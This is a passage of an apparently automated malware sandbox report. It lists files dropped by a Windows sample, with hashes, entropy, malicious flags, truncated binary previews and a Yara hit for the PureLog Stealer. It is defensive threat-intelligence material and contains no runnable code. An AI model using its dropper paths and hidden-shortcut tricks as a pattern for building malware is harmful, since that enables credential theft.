                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t.9d0.W70.W70.W7...73.W70.V7m.W7.M.71.W7v..7..W7v..7..W7v..7$.W7.s.7e.W70.W7'.W7.s.71.W7=..71.W7.s.71.W7Rich0.W7........PE..d......].........." .....8...........\...............................................$....`.................................................|...(....`..........x]..."..h!...p.......R..8...............................p............P..H............................text...7+.......,.................. ..`.rodata......@.......0.............. ..`.rdata..FP...P...R...<..............@..@.data... K.......&..................@....pdata..x].......^..................@..@.rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmp
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):1297
                                          Entropy (8bit):5.115489615345492
                                          Encrypted:false
                                          SSDEEP:24:CbUneZXof9+bOOrXqFT09+JYrXqFTzl796432s4EOkUs8QROJ32s3yxsITf+3t1e:Cn3OOrXqJ07rXqJzr6432sv832s3EsI/
                                          MD5:AAF4009F5963B1B270D8C3E697EBE442
                                          SHA1:F5A44235094DA0B8B5992C6112CB8C356EF22B93
                                          SHA-256:3988CDCCB878675B4AB8C11F21EF7F6301451F59E2E2BF3F07E963D36C8E9767
                                          SHA-512:BC30F4C5F17E4F0CDE2CDD5C36A6EC28271569E18808E736186D42409564E3E6FFA8AD23842912C90F39CE6264A698714A434092778C74CBDE6C330DD3969109
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:Copyright (c) 2013, Cisco Systems.All rights reserved...Redistribution and use in source and binary forms, with or without modification,.are permitted provided that the following conditions are met:..* Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer...* Redistributions in binary form must reproduce the above copyright notice, this. list of conditions and the following disclaimer in the documentation and/or. other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE.DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR.ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES.(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERV
                                          Process:C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmp
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):51
                                          Entropy (8bit):3.48286657951254
                                          Encrypted:false
                                          SSDEEP:3:cUoytoUD6MBomFUT:cUoQoUD6Qoyy
                                          MD5:034D89CD2C41EDFCEADA9F96A3C0A56A
                                          SHA1:92AB4E6FF98CA987D56EA3C1BA36D1C61EF23ACB
                                          SHA-256:44BBE94D481B106F00223DD406D015AEFD00CFA2DBA9428BEFC2B8F6A3FEB971
                                          SHA-512:6C3E701D2D0FD24FDB46C0E1B0EF5245F36E4A34A9D2340665A31F6331C2D6F08680399600FB02C3D51694F9BAFFB3E41A367CB4FE945D4836B669DA63EB6358
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:1 1..4 3..3 2..16 9..6 5..468 60..728 90..2592 1936
                                          Process:C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmp
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:modified
                                          Size (bytes):2817403
                                          Entropy (8bit):6.609843339002919
                                          Encrypted:false
                                          SSDEEP:49152:kJB6eypEAq+ZRXDHw2mUDlcjGA6PHTzOCdw5V:JnbPXDQ2melci7PHqL
                                          MD5:578530F1C73BA58C2D868B45C7223945
                                          SHA1:3E23CE8B870A4C1061103289B461AA7390AAE9D6
                                          SHA-256:204FE3CF3707B6739E4A5FD8DEA0E69787A1353A4BFEF9BD29BF5FF084931B3A
                                          SHA-512:2F56F6C27F5144FE1F465B509740274B31E37B7F63B959E841390C9647CA8CEE8E5F08E4CC6A54D7898B1F69C496AED7E9979489EFA043F4680ACDDDD1C16416
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.^............................T.............@..........................0+......................................................p...\..............................................................................H............................text............................... ..`.rdata..X........0..................@..@.data...8T.......0..................@....rsrc....`...p...`...@..............@..@_set_1...`......{]..................a.U.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmp
                                          File Type:InnoSetup Log Turquoise CD Player, version 0x30, 5317 bytes, 549163\user, "C:\Users\user\AppData\Local\Turquoise CD Player"
                                          Category:dropped
                                          Size (bytes):5317
                                          Entropy (8bit):4.798211028517384
                                          Encrypted:false
                                          SSDEEP:96:0jdWK488Xp/8xXhV94+eOIhrw4cVSQs0LvvB:qdWK488p/qxJHIhZcVSQ1x
                                          MD5:076072735CC22B59AE2174E2BB5ED519
                                          SHA1:9402588D3211FB1AAB0F4ED72DB9E2EF1998BBC0
                                          SHA-256:F92908DE4389C14D2D6FD746C44C09096D3EB67194563310382103665A41C9BC
                                          SHA-512:34A5EA739F9FCACB4297445C75C899321F4717BF0C7A505A9728E1518464230A7197E04128B88608321AEF9C40159399A58A23110906115E933DB27480D11B78
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:Inno Setup Uninstall Log (b)....................................Turquoise CD Player.............................................................................................................Turquoise CD Player.............................................................................................................0...........%...............................................................................................................]..#...........b......R....549163.user1C:\Users\user\AppData\Local\Turquoise CD Player.................. .....9......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User
                                          Process:C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmp
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):707354
                                          Entropy (8bit):6.470927487159611
                                          Encrypted:false
                                          SSDEEP:12288:D0QfKb7nH5lrPo37AzHTA63I0ihE4UEQrrNtIECORGv65ELAfXExy8s:nfKbT5lrPo37AzHTA63/cfU9IEU653fz
                                          MD5:F612FA84EEE47A292945FBB628986AB7
                                          SHA1:007F558AFE9BA619E3F57E6388385C28BCC81424
                                          SHA-256:40AE950AA309906160DA060388D771DC40A809617034E9B0BCAF7C7ED8103419
                                          SHA-512:AF7D47AAEBCE6A8494BB4C2833448834E3DA734B95A8AD43BE5903938F259D3C83E50F030A717571E85BF06BA660EC950418DB9BF230CCBA9CC9E0E73D688F0B
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................&...........1.......@....@..............................................@...............................%...`...>..........................................................................................................CODE.....$.......&.................. ..`DATA....<....@.......*..............@...BSS..........`.......<...................idata...%.......&...<..............@....tls.................b...................rdata...............b..............@..P.reloc..............................@..P.rsrc....>...`...>...d..............@..P.....................*..............@..P........................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):744960
                                          Entropy (8bit):7.822971503052979
                                          Encrypted:false
                                          SSDEEP:12288:q+dJfgo8vQKBuYVcUOmsIzxGd1OrZ7Ir2YjqF7fKjnmaoBt9WWayr9q0:hgoWQKBuXUtgdAJ2maoBtKyr9q0
                                          MD5:ADD437E239EBA1CEABCA80AF38F80B56
                                          SHA1:7D288EB76B3F0B1B3C37A020A61E97D4E43A1450
                                          SHA-256:2CE2C104C964166CF5FC95D7C855C173533BF28B7053A398BB01E757FD0D94EA
                                          SHA-512:C6447B5E35F05399EFB4263DB09C2E980F402C2368A06806A37684B0B248635B6F64F51587479D9FE66F833F5C44EA7A571CE7D5F5886A5EB54B6DF30F9A9FD5
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H...)..)..)..{..)..{1..)..{0.)..QB.)..)...)....4.)..{..)......)..Rich.)..........................PE..L...`{]e............................v=....... ....@............................................................................<....@...............................................................x..@............ ..P............................text...#........................... ..`.rdata..Rk... ...l..................@..@.data...........8...|..............@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2251
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3::
                                          MD5:0158FE9CEAD91D1B027B795984737614
                                          SHA1:B41A11F909A7BDF1115088790A5680AC4E23031B
                                          SHA-256:513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
                                          SHA-512:C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 12:40:12 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                          Category:dropped
                                          Size (bytes):2436
                                          Entropy (8bit):3.5853371292286824
                                          Encrypted:false
                                          SSDEEP:48:8STdfTXdanRYrnvDdAKRkdA0qOJq87dAKR+/KRllynP:8SJ4SINly
                                          MD5:A9A49502C44818B0D2E80BFE6503F9E3
                                          SHA1:A583EB1FA5D573846D34F5BF25262F3C8E2365D4
                                          SHA-256:5267B76C5C7745921E413851FC9D597194B88CECF657DF4871B873D49287EC06
                                          SHA-512:D24E711F011CA5A052CE79379F48B8484D3D518003631789AD5883906D424B13FC59B74B203D3C20E4752F849A65E4DAA8E386361A52B552F83F2B04756E1EB0
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ......,....}..L.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DW.H..PROGRA~1..t......O.IDW&l....B...............J.......8.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWUl....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWUl....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWUl..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDW)l..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.G.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.@. .-
                                          Process:C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 5 21:41:46 2021, mtime=Wed Oct 4 12:34:48 2023, atime=Fri Sep 29 11:17:35 2023, length=4210216, window=hide
                                          Category:modified
                                          Size (bytes):2506
                                          Entropy (8bit):3.682697400104861
                                          Encrypted:false
                                          SSDEEP:48:8dQG2dOyW+YusJ2JrnzTdRdkqOJq5dLXuHj0PkZy+7:8bVSl7uD0PkZy
                                          MD5:3FDE95F4E80B8E52A1E89534B5D18455
                                          SHA1:631A964A86619B52C8CF229E24B9703508690097
                                          SHA-256:F149E3DF33F1667C279DC227BC90BADE76E3C39450812752A88BD9DCCBDB51CE
                                          SHA-512:7A14ED0C0BA3ABBD4DB09F711EEBA73311422AEB6C1447C88B0CC2E9F3857606531A5C8AB096B463976B7E263630C1F6D77F0D173FB588C5D168B64EBFD2C16D
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. .....|.K...e[P......?......(>@.....................1....P.O. .:i.....+00.../C:\.....................1.....DW-F..PROGRA~2.........O.IDW&l....................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....\.1.....CW.`..MICROS~1..D......(Ux.DWUl..........................6|..M.i.c.r.o.s.o.f.t.....N.1.....CWaa0.Edge..:.......S8.DWUl...........................s..E.d.g.e.....`.1.....CWaa0.APPLIC~1..H.......S8.DWUl..............................A.p.p.l.i.c.a.t.i.o.n.....`.2.(>@.=W2b .msedge.exe..F.......S8.DWUl....u.......................q.m.s.e.d.g.e...e.x.e.......k...............-.......j............F.......C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe....B.r.o.w.s.e. .t.h.e. .w.e.b.N.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.1.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.
                                          Process:C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Tue Oct 3 09:48:42 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                          Category:dropped
                                          Size (bytes):2477
                                          Entropy (8bit):3.613168324457863
                                          Encrypted:false
                                          SSDEEP:48:8S7dBT6DpRYrnvs4dAKRkdA0qOJq87dAKR+/KRlay8Ec:8SnhCNayd
                                          MD5:D742725F7E1CE64FF16D7603C535F4F2
                                          SHA1:40D850D20D82C5646AB7C963BE80E1D7AD236C83
                                          SHA-256:A1823210FC162B973878B406DE24F1AB91AC49FC23AF5B7DF9D01EA7D2E4601E
                                          SHA-512:395F5BAAB6D6A5CF4C54886E19C3935C1A4D04673490A2AA7AA326E0E56C52830ED05E333BDDDDAEACB22E71AF9D263F35072CAD35D1574C031350B7232E0CD1
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ......,.....=.,.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....CW.V..PROGRA~1..t......O.ICW.V....B...............J.....p+j.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VCW.V....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VCW.V....M.....................G-..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VCW.V..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VCW.V..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.M.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):32768
                                          Entropy (8bit):0.017262956703125623
                                          Encrypted:false
                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):32768
                                          Entropy (8bit):0.017262956703125623
                                          Encrypted:false
                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):5382672
                                          Entropy (8bit):6.621301293389298
                                          Encrypted:false
                                          SSDEEP:98304:tfblDCLzsVGzo6WvZ4vALxjloC4/ozr0J:tblO8V+o6dv4iFAnc
                                          MD5:029B4A16951A6FB1F6A1FDA9B39769B7
                                          SHA1:A64E56DC24E713637AF0EF71B279F39843E0F0EB
                                          SHA-256:94DB25630E224DE4D562F408CA6ED1259EAE3645931174FCD57C07AD6933AA61
                                          SHA-512:3A117B879F96C42387CC088A2F05F441222F0DFBFB4F405F1E09BC03F92CDFB27FFA986A1F9AD4AD1E6E8D2387D3C367A54DCF51A7C2E1F32F48FB15B8406BFC
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........p.........................p...........~+....~+.....~+......~+..................Z...O(......O(............O(......Rich....................PE..L.....Mf...............'..!..........MI.......!...@..........................pl......-R...@...................................*.......%......................`l...............................*..................................................... ..!......:.................. ..` N.....!......>..............@..@ .....p$......6..............@....rsrc.........%......F..............@..@ 4.....)..V...(..............@..B.idata........*......~..............@....tls..........*..........................themida..A...*...A.................`....reloc.......`l......"R................@........................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):744960
                                          Entropy (8bit):7.822971503052979
                                          Encrypted:false
                                          SSDEEP:12288:q+dJfgo8vQKBuYVcUOmsIzxGd1OrZ7Ir2YjqF7fKjnmaoBt9WWayr9q0:hgoWQKBuXUtgdAJ2maoBtKyr9q0
                                          MD5:ADD437E239EBA1CEABCA80AF38F80B56
                                          SHA1:7D288EB76B3F0B1B3C37A020A61E97D4E43A1450
                                          SHA-256:2CE2C104C964166CF5FC95D7C855C173533BF28B7053A398BB01E757FD0D94EA
                                          SHA-512:C6447B5E35F05399EFB4263DB09C2E980F402C2368A06806A37684B0B248635B6F64F51587479D9FE66F833F5C44EA7A571CE7D5F5886A5EB54B6DF30F9A9FD5
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H...)..)..)..{..)..{1..)..{0.)..QB.)..)...)....4.)..{..)......)..Rich.)..........................PE..L...`{]e............................v=....... ....@............................................................................<....@...............................................................x..@............ ..P............................text...#........................... ..`.rdata..Rk... ...l..................@..@.data...........8...|..............@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):5154288
                                          Entropy (8bit):7.171492010172408
                                          Encrypted:false
                                          SSDEEP:98304:NllmCKfheKnF4Gnuyjscn9GtGOqHLixnkmb0ZKH4lODcxSgo5Gn8WuMRIn+N3gNX:NllmCKfY2uWUMBHLi6mb0ZKH4lODcxSL
                                          MD5:D9A7D15AE1511095BC12D4FAA9BE6F70
                                          SHA1:B90FBB35EB6DD050E4829ECAC702FEAB90F58859
                                          SHA-256:BDC61E24B03DB5DBDEAF7979906EA51F0BFE388B41D8E7E80BDE6D9ACD716BBA
                                          SHA-512:F913E5BBB998AD8A391EA99C6D045081DA5AF128B9391C3A0249EC4EEB9A504BE796B3315E7C5B4BAE825B7629527719A845A974F4EBA37BD0233B86E5483E25
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exe, Author: Joe Security
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8.................P...J..L........K.. ... K...@.. ........................N......GO...@.................................P.K.K.... K..I...........8N..m....N...................................................... ............... ..H............text.....J.. ....J................. ..`.rsrc....I... K..J....J.............@..@.reloc........N......6N.............@..B..................K.....H........=..T...........hY..{.8.........................................6+.(..GJ(....*..:+.(m..1.(....*.V+.(^ Hg..(....8.....*..B+.(6.YT~.......*...6+.() sm~....*...0..........+.(BTd/ ........8........E........3...8....s.........8....*s.........8*...s.........8....s......... .....:....&8....s.........8......0..&.......+.(|.\9.~....o......8....8....8......*...0..+.......+.(.r0k8....8....8.....~....o......8......*..0..&.......+.($R.:.~....o......8....8....8......*...0..&.......
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):221184
                                          Entropy (8bit):6.939928485719776
                                          Encrypted:false
                                          SSDEEP:3072:jMVPYhwPGRcU82DFUT6UX+vkZQ2ftfLmaPUDF2QXrKj1bEVy:IPGdRK2euUXrftjmacDcrj1b
                                          MD5:EEAB6B508F842CE18D229914CD7167F7
                                          SHA1:739E0C2CBDC05C27962A4BF5D1388BC31ABC8811
                                          SHA-256:DCA2FAEC2933DBE461D5583BA92D89633F4C48BB33C39D9F1F9915A323ECCFF3
                                          SHA-512:465D18D0C28B7579CAC4F4B3B67A0CB065DF699327401D8EDBBF7433083863FF36099BA71D4E9784BDB9CE035209B60B330863DE917C05F247F93EEFBCE4CE74
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\..\..\..Q...F..Q.>.(..Q.?.{..U.M.[..\..9...w?.]..Q...]...w..]..Rich\..........PE..L....R.c.....................L.......?............@..........................@...............................................X..P..................................4Y...............................N..@...............h............................text............................... ..`.rdata...q.......r..................@..@.data....0...p...v...T..............@....rsrc..............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):3134464
                                          Entropy (8bit):7.987488694347116
                                          Encrypted:false
                                          SSDEEP:49152:sa24nrYoeu14yHYne7V64z4APA5EtaUi7YcI5NtMQQDF4PAxf0NQdX1fwCm:Dncol14y4e7Vm0xaMcojM/DMAxf0yXF9
                                          MD5:F57F726F9E1B8C24B4F7C275FFAC78CF
                                          SHA1:339FED05D2D4A963E734E22741C89979D6B68B73
                                          SHA-256:AC9BF57379A94E559528BA283CBF74BF0DACF647CBB7F485437C361246FBD123
                                          SHA-512:C5BE34173BF2B710C57B4497A065FE19FB9DD62459EDFF56FDCC85363CCEDB53FC39989ED287DD07295A15E8DC86BF7902C68BD23E2B765CFC5B0ED94B56FA8F
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......j.....s...s...s.e.p.%.s.e.v...s.e.t./.s..y..*.s..yw.=.s..yp.4.s..yv.u.s.e.w.6.s.e.u./.s.e.r.5.s...r...s..zz.2.s..z../.s..../.s..zq./.s.Rich..s.................PE..L....iLf...............'.....|..................@......................................@... .. .... .. ..........P.......,........`..4...................0........................................................................................................<..................@........................@..............@............P...P.......B..............@............ ...........J..............@....................b...J..............@....rsrc.... ...`......................@..@.........`y......(..................@....data.....!.......!.................@...................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                          Category:dropped
                                          Size (bytes):228864
                                          Entropy (8bit):6.12511745585131
                                          Encrypted:false
                                          SSDEEP:3072:tneBqhy5aVLOwqI8sgwoEHXfwaNUM+/ORSs5G2Ms4f6TFZbhgvbUxzJ8Y:tETlsgOfDt+/V6JQO98
                                          MD5:3955AF54FBAC1E43C945F447D92E4108
                                          SHA1:53C5552C3649619E4E8C6A907B94573F47130FA4
                                          SHA-256:E6DE332AD778F7A7CF160EFA60656C3AC960DC77806905493D5CFFE58EE1DE16
                                          SHA-512:FA028A040A5F075296AEBAB7F63A59B6CBBA32EE0964DFC08768396CC012FF5D861191E2478914D79D4A424C3BBA110505A58B97376C44C716F0B1EA70551037
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7...sto@sto@sto@!.lA{to@!.jALto@!.kAoto@z..@ato@..nAzto@stn@.to@..jA~to@..mArto@Richsto@........PE..d...A%"^.........."......r..........`;.........@....................................)7....`..................................................o..........0...........................0&..T....................'..(....&..................h............................text....q.......r.................. ..`.rdata..D............v..............@..@.data................f..............@....pdata...............t..............@..@.rsrc...............................@..@.reloc...............v..............@..B................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):470016
                                          Entropy (8bit):7.710386623324811
                                          Encrypted:false
                                          SSDEEP:12288:CKx2l/UOb3qihVErZBo+MV/73TXJELUve:W/L3qihVEVBzMRDXXm
                                          MD5:D816AEC818E5BE0A3B7AF1AEA4BCA1D8
                                          SHA1:39F33D063CE0DFB00CA28F591463B497448EF4A7
                                          SHA-256:6EB4BCD1025074E900C1D7D545F62AE9D92BA787F229B51A628BA941D708DEA2
                                          SHA-512:FFD4D24764A92F63862F0BD2951AE951B6EC8938851DE223C89EC3B9A9CB36B6381932B274E4336F6B4A4B23A2E7D1539C65D1CD52F8443B6EDF7287F292F842
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I.w/...|...|...|..}...|..}...|..}...|..}...|...|V..|.l.}...|.l.}...|.l.}@..|.o.}...|.o.}...|Rich...|................PE..L....Pf...............'.............G............@.......................................@.................................hY..(............................`..L....?...............................>..@...............@............................text.............................. ..`.bss................................ ..`.rdata..............................@..@.data...l....p.......>..............@....reloc..L....`......................@..B................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):2793749
                                          Entropy (8bit):7.945099975459654
                                          Encrypted:false
                                          SSDEEP:49152:ppUlRhkDckBkgWRMvmHxDhii7w5utZQohYXUA+6QHRUa2:ppUlwck+gWFHxDscOufskBUh
                                          MD5:32D986D13D2B4B6ACDC7ACE345D66BD4
                                          SHA1:9C3EF3B84F259FF84C4B9D79B40ADF5E7D83340E
                                          SHA-256:CD0B3A30E1FBEF7E9BD8CDCD5A2169F7343F4C9C43865FC65CA8B2CBF6976D73
                                          SHA-512:11F14E2064AE55FFE6E85CAE67CFE9EA724979175CBC1E217D4C642939AC1560C2E36DED025DEAD789B0192FD01D81AEE47B56C53FFB8E826752049D74E7AD4B
                                          Malicious:true
                                          Reputation:unknown
